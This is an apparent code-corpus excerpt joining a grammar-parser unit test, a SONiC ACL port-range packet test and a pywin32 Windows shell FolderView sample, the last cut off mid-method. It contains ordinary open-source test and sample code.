def test_invalid_grammar_string_empty_right_hand_side_symbol(self):
# No right hand side symbol.
# This is a valid input and should not raise error.
arithmetic_grammar.Grammar(['a -> '])
def test_parse_expressions_to_indices_sequences_input_not_list(self):
grammar_rules = [
'S -> S "+" T',
'S -> T',
'T -> "(" S ")"',
'T -> "x"',
]
grammar = arithmetic_grammar.Grammar(grammar_rules)
with self.assertRaisesRegex(
ValueError, 'expression_strings is expected to be list, but got'):
grammar.parse_expressions_to_indices_sequences(
# Note the input expression_strings is a string not a list of strings.
expression_strings='x + ( x )',
max_length=8
)
def test_parse_expressions_to_indices_sequences_short_max_length(self):
grammar_rules = [
'S -> S "+" T',
'S -> T',
'T -> "(" S ")"',
'T -> "x"',
]
grammar = arithmetic_grammar.Grammar(grammar_rules)
with self.assertRaisesRegex(
ValueError,
r'The number of production rules to parse expression .* '
'can not be greater than max_length'):
grammar.parse_expressions_to_indices_sequences(
expression_strings=['x + ( x )'],
max_length=2
)
def test_parse_expressions_to_indices_sequences_invalid_expression_string(
self):
grammar_rules = [
'S -> S "+" T',
'S -> T',
'T -> "(" S ")"',
'T -> "x"',
]
grammar = arithmetic_grammar.Grammar(grammar_rules)
with self.assertRaisesRegex(
ValueError, 'cannot be parsed to production rules'):
grammar.parse_expressions_to_indices_sequences(
expression_strings=['x x'],
max_length=8
)
def test_grammar_with_callables(self):
grammar_rules = [
'S -> S "+" S', # index 0
'S -> S "-" S', # index 1
'S -> "FUNCTION1(" P ")"', # index 2
'P -> T', # index 3
'P -> "1" "+" T', # index 4
'S -> T', # index 5
'T -> "FUNCTION2(" "x" "," "c" ")"', # index 6
] # padding rule index 7
grammar = arithmetic_grammar.Grammar(grammar_rules)
indices_sequences = grammar.parse_expressions_to_indices_sequences(
expression_strings=[
'FUNCTION1( FUNCTION2( x , c ) ) - '
'FUNCTION2( x , c ) + FUNCTION2( x , c )'],
max_length=10
)
np.testing.assert_equal(
indices_sequences,
[
# Preorder traversal of parsing tree.
# S
# |
# S '+' S
# | |
# S '-' S T
# | | |
# 'FUNCTION1(' P ')' T 'FUNCTION2( x , c )'
# | |
# T 'FUNCTION2( x , c )'
# |
# 'FUNCTION2( x , c )'
[
0, # 'S -> S "+" S'
1, # 'S -> S "-" S'
2, # 'S -> "FUNCTION1(" P ")"'
3, # 'P -> T'
6, # 'T -> "FUNCTION2(" "x" "," "c" ")"'
5, # 'S -> T'
6, # 'T -> "FUNCTION2(" "x" "," "c" ")"'
5, # 'S -> T'
6, # 'T -> "FUNCTION2(" "x" "," "c" ")"'
7, # Padding dummy production rule.
]
]
)
def test_parse_expressions_to_indices_sequences(self):
grammar_rules = [
'S -> S "+" T', # index 0
'S -> T', # index 1
'T -> "(" S ")"', # index 2
'T -> "x"', # index 3
] # padding rule index 4
grammar = arithmetic_grammar.Grammar(grammar_rules)
indices_sequences = grammar.parse_expressions_to_indices_sequences(
expression_strings=['x + ( x )'],
max_length=8
)
np.testing.assert_equal(
indices_sequences,
[
# Expression string: 'x + ( x )'
# Preorder traversal of parsing tree.
# S
# |
# S '+' T
# | |
# T '(' S ')'
# | |
# 'x' 'x'
[
0, # 'S -> S "+" T'
1, # 'S -> T'
3, # 'T -> "x"'
2, # 'T -> "(" S ")"'
1, # 'S -> T'
3, # 'T -> "x"'
4, # Padding dummy production rule.
4, # Padding dummy production rule.
]
]
)
def test_parse_expressions_to_indices_sequences_padding_at_end_false(self):
grammar_rules = [
'S -> S "+" T', # index 1
'S -> T', # index 2
'T -> "(" S ")"', # index 3
'T -> "x"', # index 4
] # padding rule index 0
grammar = arithmetic_grammar.Grammar(grammar_rules, padding_at_end=False)
indices_sequences = grammar.parse_expressions_to_indices_sequences(
expression_strings=['x + ( x )'],
max_length=8
)
np.testing.assert_equal(
indices_sequences,
[
# Expression string: 'x + ( x )'
# Preorder traversal of parsing tree.
# S
# |
# S '+' T
# | |
# T '(' S ')'
# | |
# 'x' 'x'
[
1, # 'S -> S "+" T'
2, # 'S -> T'
4, # 'T -> "x"'
3, # 'T -> "(" S ")"'
2, # 'S -> T'
4, # 'T -> "x"'
0, # Padding dummy production rule.
0, # Padding dummy production rule.
]
]
)
def test_parse_expressions_to_indices_sequences_pad_front_unique_start(self):
grammar_rules = [
'S -> S "+" T', # index 2
'S -> T', # index 3
'T -> "(" S ")"', # index 4
'T -> "x"', # index 5
] # padding rule index 0
# 'O -> S' will be added with index 1.
grammar = arithmetic_grammar.Grammar(
grammar_rules,
padding_at_end=False,
add_unique_production_rule_to_start=True)
indices_sequences = grammar.parse_expressions_to_indices_sequences(
expression_strings=['x + ( x )'],
max_length=8
)
np.testing.assert_equal(
indices_sequences,
[
# Expression string: 'x + ( x )'
# Preorder traversal of parsing tree.
# O
# |
# S
# |
# S '+' T
# | |
# T '(' S ')'
# | |
# 'x' 'x'
[
1, # 'O -> S'
2, # 'S -> S "+" T'
3, # 'S -> T'
5, # 'T -> "x"'
4, # 'T -> "(" S ")"'
3, # 'S -> T'
5, # 'T -> "x"'
0, # Padding dummy production rule.
]
]
)
def test_parse_expressions_to_tensor(self):
grammar_rules = [
'S -> S "+" T',
'S -> T',
'T -> "(" S ")"',
'T -> "x"',
]
grammar = arithmetic_grammar.Grammar(grammar_rules)
expression_tensor = grammar.parse_expressions_to_tensor(
expression_strings=['x + ( x )'],
max_length=8
)
np.testing.assert_allclose(
expression_tensor,
[
# Expression string: 'x + ( x )'
# Preorder traversal of parsing tree.
# S
# |
# S '+' T
# | |
# T '(' S ')'
# | |
# 'x' 'x'
[
[1., 0., 0., 0., 0.], # 'S -> S "+" T'
[0., 1., 0., 0., 0.], # 'S -> T'
[0., 0., 0., 1., 0.], # 'T -> "x"'
[0., 0., 1., 0., 0.], # 'T -> "(" S ")"'
[0., 1., 0., 0., 0.], # 'S -> T'
[0., 0., 0., 1., 0.], # 'T -> "x"'
[0., 0., 0., 0., 1.], # Padding dummy production rule.
[0., 0., 0., 0., 1.], # Padding dummy production rule.
]
]
)
def test_parse_expressions_to_tensor_padding_at_end_false(self):
grammar_rules = [
'S -> S "+" T',
'S -> T',
'T -> "(" S ")"',
'T -> "x"',
]
grammar = arithmetic_grammar.Grammar(grammar_rules, padding_at_end=False)
expression_tensor = grammar.parse_expressions_to_tensor(
expression_strings=['x + ( x )'],
max_length=8
)
np.testing.assert_allclose(
expression_tensor,
[
# Expression string: 'x + ( x )'
# Preorder traversal of parsing tree.
# S
# |
# S '+' T
# | |
# T '(' S ')'
# | |
# 'x' 'x'
[
[0., 1., 0., 0., 0.], # 'S -> S "+" T'
[0., 0., 1., 0., 0.], # 'S -> T'
[0., 0., 0., 0., 1.], # 'T -> "x"'
[0., 0., 0., 1., 0.], # 'T -> "(" S ")"'
[0., 0., 1., 0., 0.], # 'S -> T'
[0., 0., 0., 0., 1.], # 'T -> "x"'
[1., 0., 0., 0., 0.], # Padding dummy production rule.
[1., 0., 0., 0., 0.], # Padding dummy production rule.
]
]
)
if __name__ == '__main__':
tf.test.main()
|
ansible/roles/test/files/acstests/acl_port_range_traffic_test.py | shubav/sonic-mgmt | 132 | 12687749 | <reponame>shubav/sonic-mgmt
import sys
import ptf.packet as scapy
import ptf.dataplane as dataplane
import acs_base_test
from ptf.base_tests import BaseTest
import ptf.testutils as testutils
from ptf.testutils import *
import scapy.all as scapy2
class SendTCP(acs_base_test.ACSDataplaneTest):
def runTest(self):
pkt = scapy2.Ether(src="e4:1d:2d:a5:f3:ac", dst="00:02:03:04:05:00")
pkt /= scapy2.IP(src="10.0.0.1", dst="10.0.0.0")
# get L4 port number
port_number = testutils.test_params_get("port_number")
port = port_number["port_number"]
pkt /= scapy2.TCP(sport = int(port))
pkt /= ("badabadaboom")
# get packets number
count = testutils.test_params_get("count")
pack_number = count["count"]
# send packets
send(self, 0, pkt, int(pack_number))
|
Src/StdLib/Lib/site-packages/win32comext/shell/demos/servers/folder_view.py | cwensley/ironpython2 | 1,078 | 12687759 | # This is a port of the Vista SDK "FolderView" sample, and associated
# notes at http://shellrevealed.com/blogs/shellblog/archive/2007/03/15/Shell-Namespace-Extension_3A00_-Creating-and-Using-the-System-Folder-View-Object.aspx
# A key difference to shell_view.py is that this version uses the default
# IShellView provided by the shell (via SHCreateShellFolderView) rather
# than our own.
# XXX - sadly, it doesn't work quite like the original sample. Oh well,
# another day...
import sys
import os
import pickle
import random
import win32api
import winxpgui as win32gui # this needs Vista, let alone XP!
import win32con
import winerror
import commctrl
import pythoncom
from win32com.util import IIDToInterfaceName
from win32com.server.exception import COMException
from win32com.server.util import wrap as _wrap
from win32com.server.util import NewEnum as _NewEnum
from win32com.shell import shell, shellcon
from win32com.axcontrol import axcontrol # IObjectWithSite
from win32com.propsys import propsys
GUID=pythoncom.MakeIID
# If set, output spews to the win32traceutil collector...
debug=0
# wrap a python object in a COM pointer
def wrap(ob, iid=None):
return _wrap(ob, iid, useDispatcher=(debug>0))
def NewEnum(seq, iid):
return _NewEnum(seq, iid=iid, useDispatcher=(debug>0))
# The sample makes heavy use of "string ids" (ie, integer IDs defined in .h
# files, loaded at runtime from a (presumably localized) DLL. We cheat.
_sids = {} # strings, indexed by string_id
def LoadString(sid):
return _sids[sid]
# fn to create a unique string ID
_last_ids = 0
def _make_ids(s):
global _last_ids
_last_ids += 1
_sids[_last_ids] = s
return _last_ids
# These strings are what the user sees and would be localized.
# XXX - its possible that the shell might persist these values, so
# this scheme wouldn't really be suitable in a real ap.
IDS_UNSPECIFIED = _make_ids("unspecified")
IDS_SMALL = _make_ids("small")
IDS_MEDIUM = _make_ids("medium")
IDS_LARGE = _make_ids("large")
IDS_CIRCLE = _make_ids("circle")
IDS_TRIANGLE = _make_ids("triangle")
IDS_RECTANGLE = _make_ids("rectangle")
IDS_POLYGON = _make_ids("polygon")
IDS_DISPLAY = _make_ids("Display")
IDS_DISPLAY_TT = _make_ids("Display the item.")
IDS_SETTINGS = _make_ids("Settings")
IDS_SETTING1 = _make_ids("Setting 1")
IDS_SETTING2 = _make_ids("Setting 2")
IDS_SETTING3 = _make_ids("Setting 3")
IDS_SETTINGS_TT = _make_ids("Modify settings.")
IDS_SETTING1_TT = _make_ids("Modify setting 1.")
IDS_SETTING2_TT = _make_ids("Modify setting 2.")
IDS_SETTING3_TT = _make_ids("Modify setting 3.")
IDS_LESSTHAN5 = _make_ids("Less Than 5")
IDS_5ORGREATER = _make_ids("Five or Greater")
del _make_ids, _last_ids
# Other misc resource stuff
IDI_ICON1 = 100
IDI_SETTINGS = 101
# The sample defines a number of "category ids". Each one gets
# its own GUID.
CAT_GUID_NAME=GUID("{de094c9d-c65a-11dc-ba21-005056c00008}")
CAT_GUID_SIZE=GUID("{de094c9e-c65a-11dc-ba21-005056c00008}")
CAT_GUID_SIDES=GUID("{de094c9f-c65a-11dc-ba21-005056c00008}")
CAT_GUID_LEVEL=GUID("{de094ca0-c65a-11dc-ba21-005056c00008}")
# The next category guid is NOT based on a column (see
# ViewCategoryProvider::EnumCategories()...)
CAT_GUID_VALUE="{de094ca1-c65a-11dc-ba21-005056c00008}"
GUID_Display=GUID("{4d6c2fdd-c689-11dc-ba21-005056c00008}")
GUID_Settings=GUID("{4d6c2fde-c689-11dc-ba21-005056c00008}")
GUID_Setting1=GUID("{4d6c2fdf-c689-11dc-ba21-005056c00008}")
GUID_Setting2=GUID("{4d6c2fe0-c689-11dc-ba21-005056c00008}")
GUID_Setting3=GUID("{4d6c2fe1-c689-11dc-ba21-005056c00008}")
# Hrm - not sure what to do about the std keys.
# Probably need a simple parser for propkey.h
PKEY_ItemNameDisplay = ("{B725F130-47EF-101A-A5F1-02608C9EEBAC}", 10)
PKEY_PropList_PreviewDetails = ("{C9944A21-A406-48FE-8225-AEC7E24C211B}", 8)
# Not sure what the "3" here refers to - docs say PID_FIRST_USABLE (2) be
# used. Presumably it is the 'propID' value in the .propdesc file!
# note that the following GUIDs are also references in the .propdesc file
PID_SOMETHING=3
# These are our 'private' PKEYs
# Col 2, name="Sample.AreaSize"
PKEY_Sample_AreaSize=("{d6f5e341-c65c-11dc-ba21-005056c00008}", PID_SOMETHING)
# Col 3, name="Sample.NumberOfSides"
PKEY_Sample_NumberOfSides = ("{d6f5e342-c65c-11dc-ba21-005056c00008}", PID_SOMETHING)
# Col 4, name="Sample.DirectoryLevel"
PKEY_Sample_DirectoryLevel = ("{d6f5e343-c65c-11dc-ba21-005056c00008}", PID_SOMETHING)
# We construct a PIDL from a pickle of a dict - turn it back into a
# dict (we should *never* be called with a PIDL that the last elt is not
# ours, so it is safe to assume we created it (assume->"ass" = "u" + "me" :)
def pidl_to_item(pidl):
# Note that only the *last* elt in the PIDL is certainly ours,
# but it contains everything we need encoded as a dict.
return pickle.loads(pidl[-1])
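# Example (illustrative): the relative PIDLs produced by make_item_enum() below
# are one-element lists whose payload is a pickled dict, so the round trip is:
#
#   item = dict(name="one", size=42, sides=3, level=1, is_folder=False)
#   pidl = [pickle.dumps(item)]
#   assert pidl_to_item(pidl) == item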
# Start of msdn sample port...
# make_item_enum replaces the sample's entire EnumIDList.cpp :)
def make_item_enum(level, flags):
pidls = []
nums = """zero one two three four five size seven eight nine ten""".split()
for i, name in enumerate(nums):
size = random.randint(0,255)
sides = 1
while sides in [1,2]:
sides = random.randint(0,5)
is_folder = (i % 2) != 0
        # Check whether the flags say to include this item
        # (folders vs non-folders vs storage items).
skip = False
if not (flags & shellcon.SHCONTF_STORAGE):
if is_folder:
skip = not (flags & shellcon.SHCONTF_FOLDERS)
else:
skip = not (flags & shellcon.SHCONTF_NONFOLDERS)
if not skip:
data = dict(name=name, size=size, sides=sides, level=level, is_folder=is_folder)
pidls.append([pickle.dumps(data)])
return NewEnum(pidls, shell.IID_IEnumIDList)
# start of Utils.cpp port
def DisplayItem(shell_item_array, hwnd_parent=0):
# Get the first ShellItem and display its name
if shell_item_array is None:
msg = "You must select something!"
else:
si = shell_item_array.GetItemAt(0)
name = si.GetDisplayName(shellcon.SIGDN_NORMALDISPLAY)
msg = "%d items selected, first is %r" % (shell_item_array.GetCount(), name)
win32gui.MessageBox(hwnd_parent, msg, "Hello", win32con.MB_OK)
# end of Utils.cpp port
# start of sample's FVCommands.cpp port
class Command:
def __init__(self, guid, ids, ids_tt, idi, flags, callback, children):
self.guid = guid; self.ids = ids; self.ids_tt = ids_tt
self.idi = idi; self.flags = flags; self.callback = callback;
self.children = children
assert not children or isinstance(children[0], Command)
def tuple(self):
return self.guid, self.ids, self.ids_tt, self.idi, self.flags, self.callback, self.children
# command callbacks - called back directly by us - see ExplorerCommand.Invoke
def onDisplay(items, bindctx):
DisplayItem(items)
def onSetting1(items, bindctx):
win32gui.MessageBox(0, LoadString(IDS_SETTING1), "Hello", win32con.MB_OK)
def onSetting2(items, bindctx):
win32gui.MessageBox(0, LoadString(IDS_SETTING2), "Hello", win32con.MB_OK)
def onSetting3(items, bindctx):
win32gui.MessageBox(0, LoadString(IDS_SETTING3), "Hello", win32con.MB_OK)
taskSettings = [
Command(GUID_Setting1, IDS_SETTING1, IDS_SETTING1_TT, IDI_SETTINGS, 0, onSetting1, None),
Command(GUID_Setting2, IDS_SETTING2, IDS_SETTING2_TT, IDI_SETTINGS, 0, onSetting2, None),
Command(GUID_Setting3, IDS_SETTING3, IDS_SETTING3_TT, IDI_SETTINGS, 0, onSetting3, None),
]
tasks = [
Command(GUID_Display, IDS_DISPLAY, IDS_DISPLAY_TT, IDI_ICON1, 0, onDisplay, None ),
Command(GUID_Settings, IDS_SETTINGS, IDS_SETTINGS_TT, IDI_SETTINGS, shellcon.ECF_HASSUBCOMMANDS, None, taskSettings),
]
class ExplorerCommandProvider:
_com_interfaces_ = [shell.IID_IExplorerCommandProvider]
_public_methods_ = shellcon.IExplorerCommandProvider_Methods
def GetCommands(self, site, iid):
items = [wrap(ExplorerCommand(t)) for t in tasks]
return NewEnum(items, shell.IID_IEnumExplorerCommand)
class ExplorerCommand:
_com_interfaces_ = [shell.IID_IExplorerCommand]
_public_methods_ = shellcon.IExplorerCommand_Methods
def __init__(self, cmd):
self.cmd = cmd
# The sample also appears to ignore the pidl args!?
def GetTitle(self, pidl):
return LoadString(self.cmd.ids)
def GetToolTip(self, pidl):
return LoadString(self.cmd.ids_tt)
def GetIcon(self, pidl):
# Return a string of the usual "dll,resource_id" format
# todo - just return any ".ico that comes with python" + ",0" :)
raise COMException(hresult=winerror.E_NOTIMPL)
def GetState(self, shell_items, slow_ok):
return shellcon.ECS_ENABLED
def GetFlags(self):
return self.cmd.flags
def GetCanonicalName(self):
return self.cmd.guid
def Invoke(self, items, bind_ctx):
# If no function defined - just return S_OK
if self.cmd.callback:
self.cmd.callback(items, bind_ctx)
else:
print "No callback for command ", LoadString(self.cmd.ids)
def EnumSubCommands(self):
if not self.cmd.children:
return None
items = [wrap(ExplorerCommand(c))
for c in self.cmd.children]
return NewEnum(items, shell.IID_IEnumExplorerCommand)
# end of sample's FVCommands.cpp port
# start of sample's Category.cpp port
class FolderViewCategorizer:
_com_interfaces_ = [shell.IID_ICategorizer]
_public_methods_ = shellcon.ICategorizer_Methods
description = None # subclasses should set their own
def __init__(self, shell_folder):
self.sf = shell_folder
# Determines the relative order of two items in their item identifier lists.
def CompareCategory(self, flags, cat1, cat2):
return cat1-cat2
# Retrieves the name of a categorizer, such as "Group By Device
# Type", that can be displayed in the user interface.
def GetDescription(self, cch):
return self.description
# Retrieves information about a category, such as the default
# display and the text to display in the user interface.
def GetCategoryInfo(self, catid):
# Note: this isn't always appropriate! See overrides below
return 0, str(catid) # ????
class FolderViewCategorizer_Name(FolderViewCategorizer):
description = "Alphabetical"
def GetCategory(self, pidls):
ret = []
for pidl in pidls:
val = self.sf.GetDetailsEx(pidl, PKEY_ItemNameDisplay)
ret.append(val)
return ret
class FolderViewCategorizer_Size(FolderViewCategorizer):
description = "Group By Size"
def GetCategory(self, pidls):
ret = []
for pidl in pidls:
# Why don't we just get the size of the PIDL?
val = self.sf.GetDetailsEx(pidl, PKEY_Sample_AreaSize)
val = int(val) # it probably came in a VT_BSTR variant
if val < 255//3:
cid = IDS_SMALL
elif val < 2 * 255 // 3:
cid = IDS_MEDIUM
else:
cid = IDS_LARGE
ret.append(cid)
return ret
def GetCategoryInfo(self, catid):
return 0, LoadString(catid)
class FolderViewCategorizer_Sides(FolderViewCategorizer):
description = "Group By Sides"
def GetCategory(self, pidls):
ret = []
for pidl in pidls:
val = self.sf.GetDetailsEx(pidl, PKEY_ItemNameDisplay)
if val==0:
cid = IDS_CIRCLE
elif val==3:
cid = IDS_TRIANGLE
elif val==4:
cid = IDS_RECTANGLE
elif val==5:
cid = IDS_POLYGON
else:
cid = IDS_UNSPECIFIED
ret.append(cid)
return ret
def GetCategoryInfo(self, catid):
return 0, LoadString(catid)
class FolderViewCategorizer_Value(FolderViewCategorizer):
description = "Group By Value"
def GetCategory(self, pidls):
ret = []
for pidl in pidls:
val = self.sf.GetDetailsEx(pidl, PKEY_ItemNameDisplay)
if val in "one two three four".split():
ret.append(IDS_LESSTHAN5)
else:
ret.append(IDS_5ORGREATER)
return ret
def GetCategoryInfo(self, catid):
return 0, LoadString(catid)
class FolderViewCategorizer_Level(FolderViewCategorizer):
description = "Group By Value"
def GetCategory(self, pidls):
return [self.sf.GetDetailsEx(pidl, PKEY_Sample_DirectoryLevel) for pidl in pidls]
class ViewCategoryProvider:
_com_interfaces_ = [shell.IID_ICategoryProvider]
_public_methods_ = shellcon.ICategoryProvider_Methods
def __init__(self, shell_folder):
self.shell_folder = shell_folder
def CanCategorizeOnSCID(self, pkey):
return pkey in [PKEY_ItemNameDisplay, PKEY_Sample_AreaSize,
PKEY_Sample_NumberOfSides, PKEY_Sample_DirectoryLevel]
# Creates a category object.
def CreateCategory(self, guid, iid):
if iid == shell.IID_ICategorizer:
if guid == CAT_GUID_NAME:
klass = FolderViewCategorizer_Name
elif guid == CAT_GUID_SIDES:
klass = FolderViewCategorizer_Sides
elif guid == CAT_GUID_SIZE:
klass = FolderViewCategorizer_Size
elif guid == CAT_GUID_VALUE:
klass = FolderViewCategorizer_Value
elif guid == CAT_GUID_LEVEL:
klass = FolderViewCategorizer_Level
else:
raise COMException(hresult=winerror.E_INVALIDARG)
return wrap(klass(self.shell_folder))
raise COMException(hresult=winerror.E_NOINTERFACE)
# Retrieves the enumerator for the categories.
def EnumCategories(self):
# These are additional categories beyond the columns
seq = [CAT_GUID_VALUE]
return NewEnum(seq, pythoncom.IID_IEnumGUID)
# Retrieves a globally unique identifier (GUID) that represents
# the categorizer to use for the specified Shell column.
def GetCategoryForSCID(self, scid):
if scid==PKEY_ItemNameDisplay:
guid = CAT_GUID_NAME
elif scid == PKEY_Sample_AreaSize:
guid = CAT_GUID_SIZE
elif scid == PKEY_Sample_NumberOfSides:
guid = CAT_GUID_SIDES
elif scid == PKEY_Sample_DirectoryLevel:
guid = CAT_GUID_LEVEL
elif scid == pythoncom.IID_NULL:
# This can be called with a NULL
# format ID. This will happen if you have a category,
# not based on a column, that gets stored in the
# property bag. When a return is made to this item,
# it will call this function with a NULL format id.
guid = CAT_GUID_VALUE
else:
raise COMException(hresult=winerror.E_INVALIDARG)
return guid
# Retrieves the name of the specified category. This is where
# additional categories that appear under the column
# related categories in the UI, get their display names.
def GetCategoryName(self, guid, cch):
if guid == CAT_GUID_VALUE:
return "Value"
raise COMException(hresult=winerror.E_FAIL)
# Enables the folder to override the default grouping.
def GetDefaultCategory(self):
return CAT_GUID_LEVEL, (pythoncom.IID_NULL, 0)
# end of sample's Category.cpp port
# start of sample's ContextMenu.cpp port
MENUVERB_DISPLAY = 0
folderViewImplContextMenuIDs = [
("display", MENUVERB_DISPLAY, 0, ),
]
class ContextMenu:
_reg_progid_ = "Python.ShellFolderSample.ContextMenu"
_reg_desc_ = "Python FolderView Context Menu"
_reg_clsid_ = "{fed40039-021f-4011-87c5-6188b9979764}"
_com_interfaces_ = [shell.IID_IShellExtInit, shell.IID_IContextMenu, axcontrol.IID_IObjectWithSite]
_public_methods_ = shellcon.IContextMenu_Methods + shellcon.IShellExtInit_Methods + ["GetSite", "SetSite"]
_context_menu_type_ = "PythonFolderViewSampleType"
def __init__(self):
self.site = None
self.dataobj = None
def Initialize(self, folder, dataobj, hkey):
self.dataobj = dataobj
def QueryContextMenu(self, hMenu, indexMenu, idCmdFirst, idCmdLast, uFlags):
s = LoadString(IDS_DISPLAY);
win32gui.InsertMenu(hMenu, indexMenu, win32con.MF_BYPOSITION, idCmdFirst + MENUVERB_DISPLAY, s);
indexMenu += 1
# other verbs could go here...
# indicate that we added one verb.
return 1
def InvokeCommand(self, ci):
mask, hwnd, verb, params, dir, nShow, hotkey, hicon = ci
        # this seems very convoluted, but it's what the sample does :)
for verb_name, verb_id, flag in folderViewImplContextMenuIDs:
if isinstance(verb, int):
matches = verb==verb_id
else:
matches = verb==verb_name
if matches:
break
else:
assert False, ci # failed to find our ID
if verb_id == MENUVERB_DISPLAY:
sia = shell.SHCreateShellItemArrayFromDataObject(self.dataobj)
            DisplayItem(sia, hwnd)
else:
assert False, ci # Got some verb we weren't expecting?
def GetCommandString(self, cmd, typ):
raise COMException(hresult=winerror.E_NOTIMPL)
def SetSite(self, site):
self.site = site
def GetSite(self, iid):
return self.site
# end of sample's ContextMenu.cpp port
# start of sample's ShellFolder.cpp port
class ShellFolder:
_com_interfaces_ = [shell.IID_IBrowserFrameOptions,
pythoncom.IID_IPersist,
shell.IID_IPersistFolder,
shell.IID_IPersistFolder2,
shell.IID_IShellFolder,
shell.IID_IShellFolder2,
]
_public_methods_ = shellcon.IBrowserFrame_Methods + \
shellcon.IPersistFolder2_Methods + \
shellcon.IShellFolder2_Methods
_reg_progid_ = "Python.ShellFolderSample.Folder2"
_reg_desc_ = "Python FolderView sample"
_reg_clsid_ = "{bb8c24ad-6aaa-4cec-ac5e-c429d5f57627}"
max_levels = 5
def __init__(self, level=0):
self.current_level = level
self.pidl = None # set when Initialize is called
def ParseDisplayName(self, hwnd, reserved, displayName, attr):
#print "ParseDisplayName", displayName
raise COMException(hresult=winerror.E_NOTIMPL)
def EnumObjects(self, hwndOwner, flags):
if self.current_level >= self.max_levels:
return None
return make_item_enum(self.current_level+1, flags)
def BindToObject(self, pidl, bc, iid):
tail = pidl_to_item(pidl)
# assert tail['is_folder'], "BindToObject should only be called on folders?"
# *sob*
# No point creating object just to have QI fail.
if iid not in ShellFolder._com_interfaces_:
raise COMException(hresult=winerror.E_NOTIMPL)
child = ShellFolder(self.current_level+1)
# hrmph - not sure what multiple PIDLs here mean?
# assert len(pidl)==1, pidl # expecting just relative child PIDL
child.Initialize(self.pidl + pidl)
return wrap(child, iid)
def BindToStorage(self, pidl, bc, iid):
return self.BindToObject(pidl, bc, iid)
def CompareIDs(self, param, id1, id2):
return 0 # XXX - todo - implement this!
def CreateViewObject(self, hwnd, iid):
if iid == shell.IID_IShellView:
com_folder = wrap(self)
return shell.SHCreateShellFolderView(com_folder)
elif iid == shell.IID_ICategoryProvider:
return wrap(ViewCategoryProvider(self))
elif iid == shell.IID_IContextMenu:
ws = wrap(self)
dcm = (hwnd, None, self.pidl, ws, None)
return shell.SHCreateDefaultContextMenu(dcm, iid)
elif iid == shell.IID_IExplorerCommandProvider:
return wrap(ExplorerCommandProvider())
else:
raise COMException(hresult=winerror.E_NOINTERFACE)
def GetAttributesOf(self, pidls, attrFlags):
assert len(pidls)==1, "sample only expects 1 too!"
assert len(pidls[0])==1, "expect relative pidls!"
item = pidl_to_item(pidls[0])
flags = 0
if item['is_folder']:
flags |= shellcon.SFGAO_FOLDER
if item['level'] < self.max_levels:
flags |= shellcon.SFGAO_HASSUBFOLDER
return flags
# Retrieves an OLE interface that can be used to carry out
# actions on the specified file objects or folders.
def GetUIObjectOf(self, hwndOwner, pidls, iid, inout):
        assert len(pidls)==1, "oops - aren't expecting more than one!"
assert len(pidls[0])==1, "assuming relative pidls!"
item = pidl_to_item(pidls[0])
if iid == shell.IID_IContextMenu:
ws = wrap(self)
dcm = (hwndOwner, None, self.pidl, ws, pidls)
return shell.SHCreateDefaultContextMenu(dcm, iid)
elif iid == shell.IID_IExtractIconW:
dxi = shell.SHCreateDefaultExtractIcon()
# dxi is IDefaultExtractIconInit
if item['is_folder']:
dxi.SetNormalIcon("shell32.dll", 4)
else:
dxi.SetNormalIcon("shell32.dll", 1)
# just return the dxi - let Python QI for IID_IExtractIconW
return dxi
elif iid == pythoncom.IID_IDataObject:
            return shell.SHCreateDataObject(self.pidl, pidls, None, iid)
elif iid == shell.IID_IQueryAssociations:
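            # These ASSOCCLASS entries associate the folder's items with the
            # context-menu handler registered for the sample progid in
            # DllRegisterServer below.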
elts = []
if item['is_folder']:
elts.append((shellcon.ASSOCCLASS_FOLDER, None, None))
elts.append((shellcon.ASSOCCLASS_PROGID_STR, None, ContextMenu._context_menu_type_))
return shell.AssocCreateForClasses(elts, iid)
raise COMException(hresult=winerror.E_NOINTERFACE)
# Retrieves the display name for the specified file object or subfolder.
def GetDisplayNameOf(self, pidl, flags):
item = pidl_to_item(pidl)
if flags & shellcon.SHGDN_FORPARSING:
if flags & shellcon.SHGDN_INFOLDER:
return item['name']
else:
if flags & shellcon.SHGDN_FORADDRESSBAR:
sigdn = shellcon.SIGDN_DESKTOPABSOLUTEEDITING
else:
sigdn = shellcon.SIGDN_DESKTOPABSOLUTEPARSING
parent = shell.SHGetNameFromIDList(self.pidl, sigdn)
return parent + "\\" + item['name']
else:
return item['name']
def SetNameOf(self, hwndOwner, pidl, new_name, flags):
raise COMException(hresult=winerror.E_NOTIMPL)
def GetClassID(self):
return self._reg_clsid_
# IPersistFolder method
def Initialize(self, pidl):
self.pidl = pidl
# IShellFolder2 methods
def EnumSearches(self):
raise COMException(hresult=winerror.E_NOINTERFACE)
# Retrieves the default sorting and display columns.
def GetDefaultColumn(self, dwres):
# result is (sort, display)
return 0, 0
# Retrieves the default state for a specified column.
def GetDefaultColumnState(self, iCol):
if iCol < 3:
return shellcon.SHCOLSTATE_ONBYDEFAULT | shellcon.SHCOLSTATE_TYPE_STR
raise COMException(hresult=winerror.E_INVALIDARG)
# Requests the GUID of the default search object for the folder.
def GetDefaultSearchGUID(self):
raise COMException(hresult=winerror.E_NOTIMPL)
# Helper function for getting the display name for a column.
def _GetColumnDisplayName(self, pidl, pkey):
item = pidl_to_item(pidl)
is_folder = item['is_folder']
if pkey == PKEY_ItemNameDisplay:
val = item['name']
elif pkey == PKEY_Sample_AreaSize and not is_folder:
val = "%d Sq. Ft." % item['size']
elif pkey == PKEY_Sample_NumberOfSides and not is_folder:
val = str(item['sides']) # not sure why str()
elif pkey == PKEY_Sample_DirectoryLevel:
val = str(item['level'])
else:
val = ''
return val
# Retrieves detailed information, identified by a
# property set ID (FMTID) and property ID (PID),
# on an item in a Shell folder.
def GetDetailsEx(self, pidl, pkey):
item = pidl_to_item(pidl)
is_folder = item['is_folder']
if not is_folder and pkey == PKEY_PropList_PreviewDetails:
return "prop:Sample.AreaSize;Sample.NumberOfSides;Sample.DirectoryLevel"
return self._GetColumnDisplayName(pidl, pkey)
# Retrieves detailed information, identified by a
# column index, on an item in a Shell folder.
def GetDetailsOf(self, pidl, iCol):
        key = self.MapColumnToSCID(iCol)
if pidl is None:
data = [(commctrl.LVCFMT_LEFT, "Name"),
(commctrl.LVCFMT_CENTER, "Size"),
(commctrl.LVCFMT_CENTER, "Sides"),
(commctrl.LVCFMT_CENTER, "Level"),]
if iCol >= len(data):
raise COMException(hresult=winerror.E_FAIL)
fmt, val = data[iCol]
else:
fmt = 0 # ?
val = self._GetColumnDisplayName(pidl, key)
cxChar = 24
return fmt, cxChar, val
# Converts a column name to the appropriate
# property set ID (FMTID) and property ID (PID).
def MapColumnToSCID(self, iCol):
